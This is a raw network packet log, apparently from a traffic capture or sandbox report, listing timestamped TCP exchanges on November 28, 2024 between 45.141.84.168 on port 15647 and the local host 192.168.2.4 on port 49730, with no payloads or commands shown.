                                          Nov 28, 2024 13:40:41.506714106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.506850004 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.511189938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.511291981 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.511365891 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.519824982 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.519906044 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.526714087 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.526829004 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.526885033 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.533467054 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.538614988 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.543339968 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.543406963 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.543500900 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.548979044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.552668095 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.554366112 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.554429054 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.557830095 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.560750008 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.566926003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.567161083 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.574440002 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.575855017 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.580174923 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.580501080 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.586919069 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.587135077 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.598890066 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.598985910 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.608973026 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.609034061 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.611407042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.611418962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.611479044 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.627067089 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.627108097 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.627130032 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.632255077 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.632703066 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.640697002 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.640714884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.640832901 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.647376060 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.648694038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.661899090 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.661986113 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.662108898 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.673042059 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.673180103 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.679383039 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.679543018 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.686589956 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.686677933 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.695838928 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.696964979 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.707848072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.708976030 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.720645905 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.721308947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.721446991 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.731417894 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.733294964 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.742620945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.745361090 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.750020027 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.754637957 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.755675077 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.768225908 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.768240929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.768348932 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.781641960 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.782407045 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.782464027 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.782516003 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.788296938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.790705919 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.799580097 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.804336071 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.804472923 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.811090946 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.811157942 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.811218977 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.828598976 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.829276085 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.833442926 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.833507061 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.833595991 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.848855019 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.848906040 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.849001884 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.859997034 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.860055923 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.860182047 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.874329090 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.875598907 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.883822918 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.883871078 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.883922100 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.897290945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.897346020 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.897394896 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.901901960 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.911654949 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.911700964 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.911828041 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.930871964 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.930963039 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.931058884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.932846069 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.932893991 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.948591948 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.948649883 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.948775053 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.953515053 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.953563929 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.962203979 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.962219000 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.962522984 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.969990969 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.970043898 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:41.981354952 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.981431961 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:41.981478930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.000983000 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.001035929 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.011953115 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.012017965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.012063980 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.030644894 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.032684088 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.042767048 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.046674013 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.054828882 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.057035923 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.066844940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.067059994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.067166090 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.073518038 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.074877024 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.075864077 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.075937986 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.089654922 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.090768099 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.095930099 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.095967054 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.096048117 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.108939886 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.121207952 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.123373985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.123430014 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.123478889 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.148466110 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.151619911 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.151700020 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.151825905 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.153116941 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.158025026 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.166598082 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.169296980 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.170523882 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.170594931 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.182554007 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.182568073 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.182621002 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.191812992 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.191848993 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.191864967 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.196372032 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.210912943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.210971117 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.213035107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.213077068 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.213085890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.223222017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.223277092 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.223304987 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.223341942 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.229168892 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.229253054 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.252795935 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.252865076 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.267816067 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.267891884 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.268512011 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.278050900 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.278268099 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.291568041 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.291691065 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.304891109 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.318439007 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.322654009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.322722912 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.322736979 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.333256006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.333339930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.333384037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.333446026 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.343743086 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.343828917 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.356933117 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.369309902 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.372997046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.373110056 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.386462927 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.388495922 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.388609886 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.402271986 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.411798954 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.411935091 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.412028074 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.412101030 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.424412012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.424460888 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.424494028 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.425345898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.425420046 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.438610077 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.438714981 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.451685905 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.453870058 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.453927994 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.468662977 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.469083071 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.469156027 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.477035046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.477097034 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.489377022 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.489450932 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.491034985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.491101027 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.505598068 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.505647898 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.506737947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.511178017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.511229992 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.511382103 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.522373915 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.522433996 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.531935930 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.531953096 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.531986952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.533458948 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.545547009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.545701027 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.550952911 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.550987005 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.550998926 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.572326899 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.572408915 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.574276924 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.574321032 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.574491024 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.574534893 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.587480068 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.587523937 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.587563038 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.589512110 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.589570999 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.597280979 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.597348928 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.599592924 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.599653959 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.611211061 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.611305952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.613241911 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.613310099 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.625837088 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.625859976 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.625965118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.631222963 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.631315947 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.640147924 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.640259981 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.644140005 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.644197941 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.644223928 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.655147076 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.655242920 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.670870066 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.672076941 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.672274113 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.678565025 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.678628922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.691487074 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.694655895 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.694766998 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.707868099 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.707978964 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.709599972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.709667921 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.712315083 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.712376118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.719943047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.720074892 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.723848104 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.723943949 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.733870983 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.734137058 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.744587898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.744683981 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.744888067 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.744946957 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.751362085 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.751439095 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.760478973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.760530949 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.760538101 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.764565945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.764668941 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.773660898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.773740053 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.774374008 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.774439096 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.774451971 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.774480104 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.788691044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.788717031 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.788757086 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.790847063 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.790901899 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.798846960 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.798985958 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.811069965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.811096907 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.811126947 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.812319994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.812371969 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.825604916 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.825623035 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.825654984 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.832876921 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.833164930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.843136072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.843193054 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.843843937 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.843862057 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.843889952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.853413105 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.853486061 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.868222952 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.868314028 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.871747017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.871819019 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.871864080 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.883975029 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.884051085 CET4973015647192.168.2.445.141.84.168
